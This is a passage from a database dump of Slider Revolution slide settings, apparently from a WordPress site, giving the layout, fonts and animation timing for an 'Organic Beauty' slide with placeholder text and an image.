text_transform=\\\"\\\"]\",\"alias\":\"Button\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"506px\",\"e\":true},\"t\":{\"v\":\"506px\",\"e\":true},\"m\":{\"v\":\"506px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"506px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-367px\",\"e\":true},\"n\":{\"v\":\"-243px\",\"e\":true},\"t\":{\"v\":\"-42px\",\"e\":true},\"m\":{\"v\":\"167px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"114px\",\"e\":true},\"n\":{\"v\":\"152px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"148px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Pri ne dicant bonorum. Vituperata ullamcorper deterruisset ius at, ea nam justo errem, per ex noster equidem iracundia. Ea ornatus inimicus salutandi duo, modo domi.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"575px\",\"e\":true},\"n\":{\"v\":\"526px\",\"e\":true},\"t\":{\"v\":\"539px\",\"e\":true},\"m\":{\"v\":\"539px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"69px\",\"e\":true},\"t\":{\"v\":\"69px\",\"e\":true},\"m\":{\"v\":\"69px\"}},\"originalWidth\":\"575px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-333px\",\"e\":true},\"n\":{\"v\":\"-234px\",\"e\":true},\"t\":{\"v\":\"-26px\",\"e\":true},\"m\":{\"v\":\"-26px\"}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"45px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"198px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Organic Beauty\",\"alias\":\"Title\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"397px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-325px\",\"e\":true},\"n\":{\"v\":\"-203px\",\"e\":true},\"t\":{\"v\":\"-19px\",\"e\":true},\"m\":{\"v\":\"7px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-86px\",\"e\":true},\"n\":{\"v\":\"-45px\",\"e\":true},\"t\":{\"v\":\"137px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":550},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1650,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 14\",\"alias\":\"Cvetic\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic3.png\",\"imageId\":3238},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"86px\"}},\"height\":{\"d\":{\"v\":\"108px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"77px\",\"e\":true},\"m\":{\"v\":\"77px\"}},\"originalWidth\":120,\"originalHeight\":108,\"aspectRatio\":{\"d\":{\"v\":1.1111111111111112},\"n\":{\"v\":1.1111111111111112},\"t\":{\"v\":1.1111111111111112},\"m\":{\"v\":1.1111111111111112}}},\"position\":{\"x\":{\"d\":{\"v\":\"-557px\",\"e\":true},\"n\":{\"v\":\"-450px\",\"e\":true},\"t\":{\"v\":\"-249px\",\"e\":true},\"m\":{\"v\":\"-249px\"}},\"y\":{\"d\":{\"v\":\"-189px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"31px\",\"e\":true},\"m\":{\"v\":\"31px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":480},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(10,4,3,'{\"title\":\"third\",\"bg\":{\"type\":\"solid\",\"color\":\"#f6cfcd\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 